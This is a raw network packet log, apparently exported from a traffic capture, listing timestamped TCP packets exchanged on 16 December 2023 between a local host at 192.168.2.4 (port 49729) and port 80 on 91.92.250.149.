                                                                                        Dec 16, 2023 18:16:56.703214884 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703249931 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703289032 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703310966 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703347921 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703413010 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703454971 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703476906 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703511000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.703543901 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.703583956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.945635080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.945693016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.945862055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.945873022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.945883989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.945894003 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.945911884 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.945939064 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.945987940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946024895 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946080923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946118116 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946166039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946202993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946235895 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946279049 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946305037 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946346045 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946408033 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946449041 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946480036 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946521044 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946574926 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946618080 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946670055 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946707964 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946758032 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946806908 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.946844101 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.946886063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947040081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947083950 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947119951 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947156906 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947213888 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947257042 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947278976 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947313070 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947345972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947386026 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947447062 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947489023 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947525024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947563887 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947623968 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947669983 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947685957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947725058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947796106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947839975 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947880983 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.947918892 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.947973013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948016882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948049068 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948082924 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948191881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948235035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948257923 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948297024 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948359013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948400021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948446989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948488951 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948512077 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948550940 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948584080 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948622942 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948705912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948750019 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948772907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948812008 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948874950 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.948920012 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.948962927 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949006081 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949028969 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949069977 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949090004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949126959 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949160099 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949197054 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949270964 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949312925 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949335098 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949373960 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949388027 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949425936 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949476957 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949516058 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949538946 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949579000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949640036 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949683905 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949706078 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949764013 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949771881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949809074 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949831963 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949871063 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949902058 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.949940920 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.949974060 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950014114 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950098038 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950143099 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950175047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950220108 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950351954 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950392962 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950424910 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950462103 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950512886 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950556993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950579882 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950617075 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950685024 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950726986 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950778961 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950814962 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950881004 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950923920 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.950956106 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.950994015 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951008081 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951045990 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951069117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951108932 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951143980 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951184034 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951195955 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951231956 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951255083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951297998 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951332092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951368093 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951453924 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951498032 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951656103 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951700926 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951757908 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951771021 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951805115 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951838970 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951877117 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.951926947 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.951966047 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.952019930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.952064037 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.952085972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.952130079 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.952193975 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.952244997 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.952279091 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.952316999 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:56.952349901 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:56.952387094 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.190860987 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.190879107 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191046953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191196918 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191239119 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191246033 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191276073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191282034 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191322088 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191328049 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191350937 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191366911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191380978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191399097 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191411972 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191437960 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191442013 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191485882 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191488981 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191528082 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191555023 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191569090 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191581011 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191596985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191612959 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191634893 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191637039 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191659927 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191673040 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191683054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191718102 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191739082 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191761971 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191772938 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191796064 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.191797018 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.191834927 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192166090 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192209005 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192210913 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192224979 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192249060 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192264080 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192275047 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192286968 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192313910 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192328930 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192362070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192368031 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192398071 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192429066 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192441940 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192472935 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192495108 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192533016 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192543983 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192555904 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192584991 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192601919 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192639112 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192648888 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192666054 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192693949 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192724943 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192764044 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192787886 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192826033 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192830086 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192852974 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.192868948 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.192883968 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193028927 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193075895 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193201065 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193243980 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193310022 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193352938 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193397999 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193438053 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193475962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193514109 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193589926 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193634987 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193658113 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193696022 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193865061 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193881989 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193892956 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193906069 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193908930 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193921089 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193938017 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.193948030 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193969011 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.193985939 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194024086 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194047928 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194086075 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194120884 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194159985 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194176912 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194190025 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194225073 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194252968 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194288969 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194309950 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194348097 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194360018 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194396973 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194430113 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194468021 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194479942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194515944 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194539070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194575071 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194590092 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194628000 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194650888 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194689035 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194701910 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194737911 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194749117 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194787025 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194809914 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194847107 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194880962 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194917917 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194935083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.194973946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.194988012 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195024014 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195045948 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195071936 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195080996 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195116043 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195136070 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195184946 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195190907 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195229053 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195251942 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195295095 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195410013 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195455074 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195465088 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195502043 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195523977 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195559978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195607901 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195647955 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195693016 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195734978 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195744991 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195766926 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195780993 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195795059 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195843935 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195880890 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195918083 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195956945 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.195960999 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.195997953 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196014881 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196052074 CET4972980192.168.2.491.92.250.149
                                                                                        Dec 16, 2023 18:16:57.196067095 CET804972991.92.250.149192.168.2.4
                                                                                        Dec 16, 2023 18:16:57.196101904 CET4972980192.168.2.491.92.250.149
